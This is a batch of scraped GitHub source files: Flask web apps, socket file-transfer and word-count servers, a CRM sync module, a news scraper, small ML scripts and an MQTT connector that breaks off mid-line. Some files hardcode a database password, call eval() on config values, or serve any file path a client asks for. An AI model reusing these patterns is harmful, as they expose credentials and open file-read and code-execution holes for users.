'ok', True\n except:\n msg, status = 'Server error -> main', False\n\n remove_old_files(file=os.path.join(save_folder, filename))\n remove_old_files(file='./output.png')\n\n result = {\"csv_table\": csv_table, \"encoded_img\": encoded_img, \"msg\": msg, \"status\": status}\n return jsonify(result)\n\n@app.route(\"/getCsv\")\ndef getCsv():\n if 'user' not in session:\n return\n try:\n csv = send_file('./output.csv',\n mimetype='text/csv',\n attachment_filename='output.csv',\n as_attachment=True)\n remove_old_files(file='./output.csv')\n return csv\n except:\n print('treat the error here')\n\n@app.route(\"/logOff\")\ndef logOff():\n session.pop('user', None)\n return render_template('LogIn.html')\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"eugeniu1994/WebApp_test","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"32507669947","text":"import argparse\nimport flask\nimport re\n\nimport db\nimport error\nimport validation\n\npet_name_regex = re.compile(\"^[A-Za-z0-9]+$\")\n\napp = flask.Flask(__name__)\n\nMAX_PET_NAME_LENGTH = 100\n\nNEW_PET_REQUEST_SCHEMA = {\n \"type\": \"object\",\n \"properties\": {\n \"name\": {\n \"type\": \"string\"\n },\n \"strength\": {\n \"type\": \"number\",\n \"minimum\": 0,\n \"maximum\": 1\n },\n \"agility\": {\n \"type\": \"number\",\n \"minimum\": 0,\n \"maximum\": 1\n },\n \"wit\": {\n \"type\": \"number\",\n \"minimum\": 0,\n \"maximum\": 1\n },\n \"senses\": {\n \"type\": \"number\",\n \"minimum\": 0,\n \"maximum\": 1\n }\n },\n \"required\": [\"name\", \"strength\", \"agility\", \"wit\", \"senses\"]\n}\n\n# from http://flask.pocoo.org/docs/0.11/patterns/apierrors/\n@app.errorhandler(error.InvalidUsage)\n@app.errorhandler(error.NotFound)\ndef handle_error(error):\n response = flask.jsonify(error.to_dict())\n response.status_code = error.status_code\n return response\n\n# from http://flask.pocoo.org/docs/0.11/patterns/sqlite3/\n@app.teardown_appcontext\ndef close_connection(exception):\n db = getattr(flask.g, '_database', None)\n if db is not None:\n db.close()\n\ndef valid_pet_name(petname):\n return pet_name_regex.match(petname) and len(petname) <= MAX_PET_NAME_LENGTH\n\n# The sum of the attributes must be <= 1.0\ndef valid_new_pet(pet):\n return valid_pet_name(pet[\"name\"]) and \\\n (pet[\"strength\"] +\n pet[\"agility\"] +\n pet[\"wit\"] +\n pet[\"senses\"]) <= 1.0\n\n@app.route(\"/new-pet\", methods=[\"POST\"])\ndef new_pet():\n\n request_data = validation.validate_json(flask.request,\n \"NEW_PET_REQUEST_SCHEMA\", NEW_PET_REQUEST_SCHEMA)\n\n conn = db.get_db(app)\n cursor = conn.cursor()\n\n cursor.execute(\"SELECT name FROM Pets WHERE name = ?;\",\n (request_data[\"name\"], ))\n\n pet = cursor.fetchone()\n\n if pet != None:\n raise error.InvalidUsage(\"A pet with the name '%s' already exists.\" %\n request_data[\"name\"])\n\n if not valid_new_pet(request_data):\n message = (\"The sum of (strength, agility, wit, senses) must be \" +\n \"<= 1.0 AND the length of name must be <= %s \" +\n \"AND the name may only contain the characters [A-Za-z0-9].\") % \\\n MAX_PET_NAME_LENGTH\n\n raise error.InvalidUsage(message)\n\n cursor.execute('''\n INSERT INTO Pets(name, strength, agility, wit, senses, wins, losses,\n experience)\n VALUES (?, ?, ?, ?, ?, ?, ?, ?);''',\n (request_data[\"name\"],\n request_data[\"strength\"],\n request_data[\"agility\"],\n request_data[\"wit\"],\n request_data[\"senses\"],\n 0, 0, 0))\n\n conn.commit()\n\n return ''\n\n@app.route(\"/get-pet/\", methods=[\"GET\"])\ndef get_pet(petname):\n\n if not valid_pet_name(petname):\n message = \"The name of the pet must be <= %s\" % MAX_PET_NAME_LENGTH\n\n raise error.InvalidUsage(message)\n\n conn = db.get_db(app)\n cursor = conn.cursor()\n\n cursor.execute(\"SELECT name, strength, agility, wit, senses, wins, \" +\n \"losses, experience FROM Pets where name = ?;\", (petname, ))\n\n data = cursor.fetchone()\n\n if data == None:\n raise error.NotFound(\"A pet with the name '%s' does not exist.\" %\n petname)\n\n response = {\n \"name\": data[0],\n \"strength\": data[1],\n \"agility\": data[2],\n \"wit\": data[3],\n \"senses\": data[4],\n \"wins\": data[5],\n \"losses\": data[6],\n \"experience\": data[7]\n }\n\n return flask.json.dumps(response)\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(prog='management.py')\n\n parser.add_argument('--db', nargs='?', 
help='Filename for the database',\n default=\"database.db\", dest=\"database_filename\")\n\n parser.add_argument('--port', nargs='?', help=\"The port to run the \" + \\\n \"server on\", default=5000, dest=\"port\", type=int)\n\n args = parser.parse_args()\n\n app.config['DATABASE'] = args.database_filename\n\n app.run(\"0.0.0.0\", args.port)\n","repo_name":"mikegagnon/battle-pets","sub_path":"management.py","file_name":"management.py","file_ext":"py","file_size_in_byte":4207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"33346449607","text":"def readline(line):\n \"\"\"\n Read one line from the *config* file, if the line is not tagged as a comment\n\n Parameters\n ----------\n line : str\n \tA line of the *config* file\n\n Returns\n -------\n key_name : str \n \tKeyname of the parameter. The name before the \"=\" symbol. It returns \"#\" if the line is commented.\n value : str\n \tValue of the parameter as written in the *config* file. It returns \"#\" if the line is commented.\n \"\"\"\n if line==None:\n return '#','#'\n elif line[0]=='#':\n return '#','#'\n elif line[0]=='':\n return '#','#'\n else:\n tokens=line.split('=')\n if len(tokens)==2:\n return tokens[0],tokens[1].strip()\n else:\n return '#','#' \n\ndef loadData(file_path):\n \"\"\"\n Recollect the model parameters from the *config* file specified by **file_path**.\n \n Parameters\n ----------\n filepath : str\n \tThe path with the directory and filename of the __config__ file.\n \t\n Returns\n -------\n config : dict\n \tA dictionary with the required parameters for the Kuramoto model.\n \tUsing the template of the __config__ file, there will not be any warning.\n \tIf you __config__ file lacks one o several parameters, it will be an error.\n \tFuture release: You can specifiy only the required parameters to change, if there is not in the __config__ file, the model is instatiated with the default parameters. \n \"\"\"\n config={}\n with open(file_path) as file:\n while True:\n line=file.readline()\n if not line:\n break\n key,data=readline(line)\n if key== 'struct_connectivity' or key=='delay_matrix':\n if key=='AAL90':\n config[key]=None\n else:\n config[key]=data\n continue\n if key=='experiment_name':\n config[key]=data\n continue\n if key=='nat_freqs':\n if data=='' or data==' ':\n config[key]=None\n else:\n config[key]=data\n continue\n if key=='ForcingNodes':\n if data=='' or data==' ':\n config[key]=None\n else:\n config[key]=data\n continue\n if key=='random_nat_freq': \n data=eval(data)\n config[key]=data\n continue\n if key=='max_workers' or key =='seed' or key =='n_nodes':\n data=int(data)\n config[key]=data\n continue\n elif key=='#':\n continue\n else:\n data=float(data)\n config[key]=data\n continue\n \n return config\n\n","repo_name":"FelipeTorr/KuramotoNetworksPackage","sub_path":"model/parserConfig.py","file_name":"parserConfig.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"73858308387","text":"# !/bin/env python3\n# -*- coding: utf-8 -*-\n\n\n#\t✪ H4WK3yE乡\n#\tMohd. Farhan Tahir\n#\tIndian Institute Of Information Technology and Management,Gwalior\n\n# Question Link\n\"\"\"\nhttps://www.hackerrank.com/challenges/candies/problem\n\"\"\"\n\n\nimport sys\n\ninf = float(\"inf\")\nmod = 1000000007\n\n\ndef get_array():\n return list(map(int, sys.stdin.readline().split()))\n\n\ndef get_ints():\n return map(int, sys.stdin.readline().split())\n\n\ndef input():\n return sys.stdin.readline()\n\n# ///==========MAIN=============///\n\n\ndef main():\n n = int(input())\n arr = [0]*n\n for i in range(n):\n arr[i] = int(input())\n forward = [1]*n\n backward = [1]*n\n for i in range(1, n):\n if arr[i] > arr[i-1]:\n forward[i] = 1+forward[i-1]\n else:\n forward[i] = 1\n for i in range(n-2, -1, -1):\n if arr[i] > arr[i+1]:\n backward[i] = 1+backward[i+1]\n else:\n backward[i] = 1\n total = 0\n for i in range(n):\n total += max(forward[i], backward[i])\n print(total)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"h4wwk3ye/code","sub_path":"Hackerrank/Dynamic Programming/candies.py","file_name":"candies.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"12120636232","text":"# server\nimport socket, os, hashlib\n \nserver = socket.socket()\nserver.bind(('localhost',2222))\n \nserver.listen()\n \nwhile True:\n conn,addr = server.accept()\n print(\"一个新的连接:\",addr)\n while True:\n print(\"等待新指令\")\n data = conn.recv(1024)\n if not data:\n print(\"客户端已经断开\")\n break\n cmd, file_name = data.decode().split() # 接收客户端发过来的命令和文件名\n print(\"执行指令:%s, 文件名:%s\" % (cmd, file_name))\n if os.path.isfile(file_name): \n m = hashlib.md5() # 生成MD5对象\n with open(file_name, \"rb\") as f:\n file_size = os.stat(file_name).st_size # 获取一个文件的大小:os.stat(文件名).st_size\n conn.send(str(file_size).encode())\n conn.recv(1024) # 等待客户端确认,防止发生粘包\n for line in f:\n m.update(line) # 不断更新计算MD5值\n conn.send(line)\n print(\"md5值\", m.hexdigest())\n conn.recv(1024) # 等待客户端确认,防止发生粘包,准备发送MD5值\n conn.send(m.hexdigest().encode()) # 发送MD5值给客户端\n print(\"send done\")\nserver.close()\n\n# client\nimport socket\n \nclient = socket.socket()\n \nclient.connect((\"localhost\", 2222))\n \nwhile True:\n cmd = input(\">>:\").strip()\n if len(cmd) == 0:continue\n print(cmd)\n if cmd.startswith(\"get\"):\n client.send(cmd.encode(\"utf-8\")) # 发送下载命令和文件名\n file_size = client.recv(1024) # 接收文件大小\n print(\"即将接收数据大小:\", file_size.decode())\n client.send(\"客户端准备好接收数据内容了\".encode())\n revived_size = 0\n file_name = cmd.split()[1] # 文件名\n m = hashlib.md5() # 生成MD5对象\n with open(file_name + \"_new\", \"wb\",) as f:\n while revived_size < int(file_size.decode()):\n if int(file_size.decode()) - revived_size > 1024: # 只要剩余文件字节大于1024字节,就默认最大值接收\n size = 1024\n else:\n size = int(file_size.decode()) - revived_size # 最后一次,剩多少收多少\n print(\"last receive:\", size)\n file_data = client.recv(size)\n revived_size += len(file_data)\n m.update(file_data) # 不断更新计算接收数据的文件值\n f.write(file_data)\n else:\n print(file_size, revived_size)\n client_md5_value = m.hexdigest() # 生成接收数据的MD5值16进制形式\n server_md5_value = client.recv(1024) # 接收服务端的MD5值\n print(\"client接收文件MD5值:%s,server发送文件的MD5值:%s\" % (client_md5_value, server_md5_value))\nclient.close()","repo_name":"syntomic/summary","sub_path":"Languages_and_Algorithms/languages/python/socket/FTP.py","file_name":"FTP.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"31572687896","text":"from frappe.model.document import Document\nimport frappe\nfrom frappe import get_doc, db, msgprint, get_meta\nimport requests\nfrom json import dumps\nfrom hashlib import md5\nfrom datetime import datetime\nfrom urllib.parse import urlencode\n\nclass FieldMapping(Document):\n\t@frappe.whitelist()\n\tdef get_fields(self, module):\n\t\tconfig = get_doc('VtigerCRM Settings')\n\t\tconfig.get_sessionname()\n\t\tvalues = {'sessionName': config.sessionname, 'operation': 'describe', 'elementType': module}\n\t\tparams = urlencode(values)\n\t\turl = 'http://' + config.host + '/' + config.path + '/webservice.php?' + params\n\t\tresponse = requests.get(url)\n\t\tif response.json()['success'] == True:\n\t\t\tfields = response.json()['result']['fields']\n\t\t\tlabel = [field['label'] + ' (' + field['name'] + ')' for field in fields]\n\t\t\treturn label\n\t\telse:\n\t\t\tmsgprint(\n\t\t\t\tmsg=response.json()['error']['message'],\n\t\t\t\ttitle=response.json()['error']['code'],\n\t\t\t)\n\n\tdef get_module_vtigercrm(self, module, fieldDocType, fieldModule):\n #ts = datetime.timestamp(datetime.now())\n #values = {'operation': 'sync', 'sessionName': self.values['sessionName'], 'elementType': 'Contacts', 'modifiedTime': ts-5000}\n #last_update = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\t\t# fieldList = \"firstname,lastname\"\n\t\tconfig = get_doc('VtigerCRM Settings')\n\t\tconfig.on_update()\n\t\tvalues = {'operation': 'query', 'sessionName': config.sessionname}\n\t\tparams = urlencode(values)\n\t\turl = 'http://' + config.host + '/' + config.path + '/webservice.php?' + params\n\t\tresults = []\n\t\ti = 0\n\t\tlimit = 100\n\t\twhile True:\n\t\t\tquery = {'query': \"SELECT \" + ','.join(fieldModule) + \" FROM \" + module + \" ORDER BY modifiedtime DESC LIMIT \" + str(i + 1) + \",\" + str(i + 100) + \";\"}\n\t\t\turl_query = url + \"&\" + urlencode(query)\n\t\t\tresponse = requests.get(url_query)\n\t\t\tlimit = len(response.json()['result'])\n\t\t\tif limit == 0:\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tprint(\"i ------------------------------------> \" + str(i))\n\t\t\t\tresponse.raise_for_status()\n\t\t\t\tif response.status_code != 204:\n\t\t\t\t\tresults = response.json()['result']\n\t\t\t\t\ti += 100\n\t\t\t\t\tfor result in results:\n\t\t\t\t\t\tlistDocType = {'doctype':'Contact'}\n\t\t\t\t\t\tfor i in range(0, len(fieldDocType)):\n\t\t\t\t\t\t\tlistDocType[fieldDocType[i - 1]] = result[fieldModule[i - 1]]\n\t\t\t\t\t\tprint(listDocType)\n\t\t\t\t\t\tself.create_contact(listDocType)\n\t\t\t\tbreak\n\n\t@frappe.whitelist()\n\tdef create_contact(self, listDocType):\n\t\tget_doc(listDocType).insert(ignore_permissions=True)\n\n\tdef on_update(self):\n\t\tif self.enabled:\n\t\t\tlfContact_VT = []\n\t\t\tlfContact_EN = []\n\t\t\tfor relationField in self.get('contacts_fields'):\n\t\t\t\tlfContact_VT.append(relationField.vtigercrm_contact[relationField.vtigercrm_contact.find('(') + 1:len(relationField.vtigercrm_contact)-1])\n\t\t\t\tlfContact_EN.append(relationField.erpnext_contact[relationField.erpnext_contact.find('(') + 1:len(relationField.erpnext_contact)-1])\n\t\t\tself.get_module_vtigercrm('Contacts', lfContact_EN, lfContact_VT)\n\t\t\t\t#results = self.get_module_vtigercrm('Contacts', fieldList)\n\t\t\tif self.schedule:\n\t\t\t\t\"\"\"event = frappe.get_doc(\n\t\t\t\t\t{\n\t\t\t\t\t\t\"doctype\": \"Event\",\n\t\t\t\t\t\t\"owner\": self.owner,\n\t\t\t\t\t\t\"subject\": 'description',\n\t\t\t\t\t\t\"description\": 'description',\n\t\t\t\t\t\t\"starts_on\": 
'cstr(key[\"scheduled_date\"])' + \" 10:00:00\",\n\t\t\t\t\t\t\"event_type\": \"Private\",\n\t\t\t\t\t}\n\t\t\t\t)\n\t\t\t\tevent.add_participant(self.doctype, self.name)\n\t\t\t\tevent.insert(ignore_permissions=1)\"\"\"\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tpass\n","repo_name":"mrrocky2023/mrrockyfinal","sub_path":"mrrocky/mrrocky/doctype/field_mapping/field_mapping.py","file_name":"field_mapping.py","file_ext":"py","file_size_in_byte":3406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"11502409673","text":"import requests\nfrom bs4 import BeautifulSoup\nimport time\nimport datetime\nfrom mysqlwith import connector\n\n\nclass naver_now:\n BASE_URI = 'https://entertain.naver.com'\n PAGE_URI = BASE_URI + (\n '/now'\n '?sid=%(sid)s'\n '&date=%(date)s'\n '&page=%(page)s'\n )\n\n\n def __init__(self):\n self.sid = '7a5'\n self.date = datetime.date.today()\n self.page = 1\n self.max = 100\n self.contents = []\n self.mysql_config = {\n 'db': 'apps',\n 'host': 'localhost',\n 'user': 'rusk',\n 'passwd': 'alsueopseo'\n }\n\n\n def fetch_posts(self):\n self.fetch_from_db()\n self.fetch_timeline()\n self.fetch_texts()\n\n\n def fetch_from_db(self):\n with connector(self.mysql_config) as connect:\n cursor = connect.cursor()\n cursor.execute('select uri from navernow order by id desc limit 1')\n self.latest_uri = cursor.fetchone()[0]\n cursor.close()\n\n\n def write_to_db(self):\n with connector(self.mysql_config) as connect:\n cursor = connect.cursor()\n for item in reversed(self.contents):\n title = item['title'].replace('\\'', u'\\\\\\'')\n text = item['text'].replace('\\'', u'\\\\\\'')\n cursor.execute(\"insert into navernow (uri, title, time, text, thumbnail) values ('%s', '%s', '%s', '%s', '%s')\"\n % (item['uri'], title, item['time'], text, item['thumbnail']))\n cursor.close()\n\n\n def fetch_timeline(self):\n uri = self.PAGE_URI % {\n 'sid': self.sid,\n 'date': self.date,\n 'page': self.page\n }\n res = requests.get(uri)\n soup = BeautifulSoup(res.text, 'html.parser')\n lst = soup.select_one('.news_lst')\n soup = BeautifulSoup(str(lst), 'html.parser')\n items = soup.select('li')\n if items[0].string == '기사가 없습니다.':\n return\n for item in items:\n content = {\n 'title': item.select_one('.tit').get_text(),\n 'uri': item.select_one('.tit')['href'],\n 'ago': item.select_one('em').get_text()\n }\n if content['uri'] == self.latest_uri:\n print('Listed %s Posts' % len(self.contents))\n return\n try:\n content['thumbnail'] = item.select_one('img')['src']\n except TypeError:\n content['thumbnail'] = 'NULL'\n self.contents.append(content)\n print('Listed %s Posts' % len(self.contents))\n if len(self.contents) >= self.max:\n return\n time.sleep(0.1)\n self.page += 1\n self.fetch_timeline()\n\n\n def fetch_texts(self):\n count = 0\n for item in self.contents:\n count += 1\n uri = self.BASE_URI + item['uri']\n res = requests.get(uri)\n soup = BeautifulSoup(res.text, 'html.parser')\n item['time'] = soup.select_one('.article_info em').get_text()\n text = soup.select_one('#articeBody').get_text()\n text = text.replace('\\n', '')\n item['text'] = text.replace('\\t', '')\n print('Fetched %s %s / %s' % (uri, count, len(self.contents)))\n time.sleep(0.1)\n\n\ndef main():\n contents = naver_now()\n contents.fetch_posts()\n contents.write_to_db()\n print('Done')\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"dytlzl/navernow_scraper","sub_path":"navernowdb.py","file_name":"navernowdb.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"29703084014","text":"from sklearn.naive_bayes import GaussianNB\nimport pandas as pd\nimport numpy as np\nimport statistics\nnp.set_printoptions(precision=2)\n\n\ndef main():\n # cross_validate()\n split_data()\n\n\ndef split_data():\n data = load_data()\n bagged_data = data.sample(n=data.shape[0], replace=True)\n classes = bagged_data.iloc[:, 0]\n attributes = bagged_data.iloc[:, 1:]\n # print(attributes[:15])\n number_of_instances = len(bagged_data)\n num_folds = 5\n fold_size = number_of_instances / num_folds\n accuracies = []\n for i in range(5):\n train_attributes = pd.concat([attributes.iloc[:(int((num_folds - (i + 1)) * fold_size))],\n attributes.iloc[int((num_folds - i) * fold_size):]])\n\n train_classes = pd.concat([classes.iloc[:(int((num_folds - (i + 1)) * fold_size))],\n classes.iloc[int((num_folds - i) * fold_size):]])\n\n test_attributes = attributes.iloc[(int((num_folds - (i + 1)) * fold_size))\n :(int((num_folds - i) * fold_size))]\n\n test_classes = classes.iloc[(int((num_folds - (i + 1)) * fold_size))\n :(int((num_folds - i) * fold_size))]\n print(\"\\t\\t\\t\\tFOLD %d\\n\" % (i + 1))\n accuracies.append(float(predict(train_attributes, train_classes, test_attributes, test_classes)))\n\n print('Mean is: %.2f%%' % (statistics.mean(accuracies)))\n print('Standard Deviation is %f' % (statistics.pstdev(accuracies)))\n\n\ndef predict(train_attributes, train_classes, test_attributes, test_classes):\n gnb = GaussianNB()\n data = load_data()\n y_pred = gnb.fit(train_attributes, train_classes).predict(test_attributes)\n data_size = float(test_attributes.shape[0])\n correctly_predicted = (test_classes != y_pred).sum()\n print(\"Number of mislabeled points out of a total %d points : %d\"\n % (data_size, correctly_predicted))\n\n inaccuracy = (correctly_predicted / float(data_size)) * 100.\n print(\"Accuracy is: %.2f\" % (100 - inaccuracy))\n print('\\n')\n\n return 100 - inaccuracy\n\n\ndef load_data():\n data = pd.read_csv('letter-recognition.data.csv')\n return data\n\n\nmain()\n","repo_name":"emkayDauda/MachineLearningAssignment","sub_path":"Naive/BaggedBayes.py","file_name":"BaggedBayes.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"3879616797","text":"\r\nimport socket\r\n#biblioteca para converter qualquer tipo de dado em binário\r\nimport marshal\r\n#Biblioteca para o uso de threadings\r\nimport threading\r\n#Biblioteca para utilizar a função encoding para utilização de caracteres especiais no ficheiro\r\nimport codecs\r\n#Biblioteca para trabalhar com datas e horas\r\nimport datetime\r\n\r\n# Numero de porta na qual o servidor estara esperando Ligações.\r\nserverPort = 7000\r\n# Criar o socket\r\nsocketServidor = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n# Associa o socket á porta escolhida, O Primeiro argumento vazio indica\r\n# que aceitamos ligações em qualquer interface de rede desse host\r\nsocketServidor.bind(('', serverPort))\r\n# Configura o socket para aceitar ligações\r\nsocketServidor.listen()\r\n\r\n#Lista para envio de palavras para o cliente\r\nlista_palavras_cliente = []\r\n\r\n#Função principal que vai ser chamada no menu no final do programa\r\ndef main(path):\r\n #Abertura do ficheiro, o bloco Try permite que o utilizador receba uma mensagem personalizada caso não seja possivel abrir o ficheiro\r\n try:\r\n file = open(f\"{path}\", 'r',encoding='utf-8')\r\n except:\r\n print(\"\\n[Servidor]Erro ao abrir o ficheiro, O programa vai terminar\")\r\n return \"[Cliente]Erro ao abrir o ficheiro, O programa vai terminar\"\r\n exit()\r\n\r\n #leitura do ficheiro para uma lista\r\n texto = file.read().lower()\r\n\r\n #Fecha a ligação ao ficheiro\r\n file.close()\r\n\r\n #Cria uma lista com caracteres\r\n pont_list_chr=[]\r\n\r\n def chr_list(begin, end):\r\n #lê um inteiro e converte em caracter, e adiciona á lista\r\n for i in range(begin, end):\r\n pont_list_chr.append(chr(i))\r\n\r\n #Range de caracteres na tabela ASCII\r\n chr_list(33,48)\r\n chr_list(58,65)\r\n chr_list(91,97)\r\n chr_list(123,127)\r\n\r\n #Função para remover todos os caracteres especiais\r\n def remove_char(text): \r\n\r\n for char in pont_list_chr:\r\n text = text.replace(char, '')\r\n return text\r\n\r\n #Atribui a string a variavel texto mas sem os caracteres especiais\r\n texto = remove_char(texto)\r\n\r\n #Função para converter a String sem os caracteres especiais em lista\r\n #A função strip() remove os espaços no inicio e fim da string\r\n def convert_list(text):\r\n\r\n for line in text:\r\n line = line.strip()\r\n lista = list(text.split())\r\n return lista\r\n\r\n #Cria uma lista de palavras separadas por espaço\r\n lista_final = convert_list(texto)\r\n\r\n #Função para criar um dicionario com os pares de palavras e a sua ocorrencia no texto lido\r\n def get_words_count(lista):\r\n\r\n dic = {}\r\n counter = 0\r\n for word in lista:\r\n if word in dic:\r\n dic[word] = dic[word] + 1\r\n else:\r\n dic[word] = 1\r\n \r\n return dic\r\n\r\n #Cria um novo dicionário com a contagem das palavras\r\n dicionario = get_words_count(lista_final)\r\n\r\n #Função para organizar o dicionário e fazer print ordenado\r\n def order_score(dic):\r\n '''ordenação do dicionário com função lambda em que a comparação é feita com o valor x[1]\r\n utilizamos o reverse=True para alterar a ordem do sorted()\r\n referencia para a função lambda. 
(https://docs.python.org/3/reference/expressions.html#lambda) \r\n (https://towardsdatascience.com/two-simple-method-to-sort-a-python-dictionary-a7907c266dba)'''\r\n\r\n dic = sorted(dic.items(), key=lambda x: x[1], reverse=True)\r\n\r\n # Ciclo para percorrer o dicionario, mostra a palavras e o valor, das 20 mais utilizadas\r\n lugar = 1\r\n\r\n while lugar < 20:\r\n for i in dic[:20]: \r\n lista_palavras_cliente.append(f\"{lugar} º - {i[0]} - {i[1]} ocorrências\")\r\n lugar += 1 \r\n \r\n\r\n\r\n #Execução das funções do programa\r\n order_score(dicionario) \r\n\r\n#Função que trata os pedidos dos clientes\r\ndef pedido_Cliente(socketCliente):\r\n \r\n # Recebe os dados do cliente\r\n pacote = socketCliente.recv(4096)\r\n #Descodifica os dados recebidos\r\n path = marshal.loads(pacote)\r\n\r\n #Informação dos dados recebidos pelo servidor\r\n print(f\"Servidor recebeu o pacote: {path}\")\r\n\r\n # Executa a função main para obter as palavras\r\n print(\"A processar os Dados...\")\r\n\r\n #Função para tratar as palavras\r\n main(path)\r\n\r\n # Envia mensagem de resposta para o cliente\r\n socketCliente.send(marshal.dumps(lista_palavras_cliente))\r\n print(f\"[Servidor] Lista de palavras enviadas ao cliente\")\r\n\r\n # Fecha a conexão\r\n socketCliente.close()\r\n\r\nprint ('O servidor esta pronto para receber pacotes...')\r\n\r\n# Loop infinito para tratar diversas ligações\r\nwhile True:\r\n # Aguardar nova Ligação\r\n print ('A Aguardar Ligações...')\r\n connectionSocket, addr = socketServidor.accept()\r\n\r\n\r\n #Trata o pedido do cliente com threads\r\n t = threading.Thread(target=pedido_Cliente, args=(connectionSocket,))\r\n\r\n # Inicia a thread\r\n t.start()\r\n\r\n\r\n \r\n","repo_name":"NunonCunha/Trabalho_2_PA","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5073,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"69907890786","text":"import numpy as np\nimport time\nfrom datetime import timedelta\nimport matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\nfrom keras.callbacks import CSVLogger\nimport gzip\nimport sys\nimport pickle\nimport pandas\nfrom keras.preprocessing import image\nimport cv2\nfrom keras.datasets import mnist\n\nstart_time = time.monotonic()\n\nf = gzip.open('mnist.pkl.gz', 'rb')\nif sys.version_info < (3,):\n data = pickle.load(f)\nelse:\n data = pickle.load(f, encoding='bytes')\nf.close()\n\nfrom keras.models import Sequential, load_model\nfrom keras.layers.core import Dense, Dropout, Activation\nfrom keras.utils import np_utils\n(X_train, y_train), (X_test, y_test) = data\n\nX_train = X_train.reshape(60000, 784)\nX_test = X_test.reshape(10000, 784)\nX_train = X_train.astype('float32')\nX_test = X_test.astype('float32')\n\nX_train /= 255\nX_test /= 255\n\nn_classes = 10\n\nY_train = np_utils.to_categorical(y_train, n_classes)\nY_test = np_utils.to_categorical(y_test, n_classes)\n\nmodel = Sequential()\nmodel.add(Dense(512, input_dim=784))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.2))\nmodel.add(Dense(10))\nmodel.add(Activation('softmax'))\n\nmodel.compile(loss='categorical_crossentropy', metrics=['accuracy'], optimizer='adam')\n\nhistory = model.fit(X_train, Y_train,\n batch_size=64, epochs=10,\n verbose=2,\n validation_data=(X_test, Y_test))\n\nend_time = time.monotonic()\nprint(timedelta(seconds=end_time - start_time))\n\nimport numpy\nloss_history = history.history[\"loss\"]\nacc_history = history.history[\"acc\"]\nnumpy_loss_history = numpy.array(loss_history)\nnumpy_acc_history = numpy.array(acc_history)\nnumpy.savetxt(\"loss_history.txt\", numpy_loss_history,delimiter=\",\")\nnumpy.savetxt(\"acc_history.txt\", numpy_acc_history,delimiter=\",\")\n\nimport matplotlib.pyplot as plt\nmatplotlib.use('TkAgg')\n\nplt.plot(history.history['acc'])\nplt.plot(history.history['val_acc'])\nplt.title('Model accuracy')\nplt.ylabel('Accuracy')\nplt.xlabel('Epoch')\nplt.legend(['Train', 'Test'], loc='upper left')\nplt.show()\n\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('Model loss')\nplt.ylabel('Loss')\nplt.xlabel('Epoch')\nplt.legend(['Train', 'Test'], loc='upper left')\nplt.show()\n\nmodel.save('neuralnet.h5')\n#tesztrész\n'''\nimage_index = 334\nplt.imshow(X_test[image_index].reshape(28, 28))\npred = model.predict(X_test[image_index].reshape(1, 784))\nprint(pred.argmax())\nplt.show()\n'''\n\n","repo_name":"rajfruzsi/Gepilatas","sub_path":"Kod1/neuralnet.py","file_name":"neuralnet.py","file_ext":"py","file_size_in_byte":2414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"69802379746","text":"\nimport paho.mqtt.client as mqtt # mqtt client for interacting with the databus\nimport json # storing and exchanging data via JSON file\nimport datetime # for current timestamp\nimport time # for sleep function\n\nAPP_NAME = \"Custom Connector\"\nCONFIG_FILE = '/cfg-data/config.json'\nMQTT_BROKER = 'ie-databus'\n\nglobal MQTT_USER\nglobal MQTT_PASSWORD\nglobal MQTT_METADATA_TOPIC\nglobal MQTT_DATA_READ_TOPIC\nglobal MQTT_DATA_WRITE_TOPIC\nglobal MQTT_STATUS_TOPIC\nglobal METADATA_JSON\nglobal STATUS_JSON\nglobal meta_json_string\nglobal status_json_string\n\nMQTT_USER = \"\"\nMQTT_PASSWORD = \"\"\nMQTT_METADATA_TOPIC = \"\"\nMQTT_DATA_READ_TOPIC = \"\"\nMQTT_DATA_WRITE_TOPIC = \"\"\nMQTT_STATUS_TOPIC = \"\"\nMETADATA_JSON = \"\"\nSTATUS_JSON = \"\"\nmeta_json_string = \"\"\nstatus_json_string = \"\"\n\n#============================\n# Reading Configuration\n#============================\n\ndef read_parameter(jsonfile):\n \n print(f'> Read params from {jsonfile}')\n \n with open(jsonfile) as params:\n data = json.load(params)\n return data\n\ndef publish_metadata(client):\n pub = client.publish(MQTT_METADATA_TOPIC, meta_json_string)\n #print(f\"> Published metadata on topic = {MQTT_METADATA_TOPIC} with result = {pub}\")\n\ndef publish_statusdata(client):\n pub = client.publish(MQTT_STATUS_TOPIC, status_json_string)\n #print(f\"> Published status data on topic = {MQTT_STATUS_TOPIC} with result = 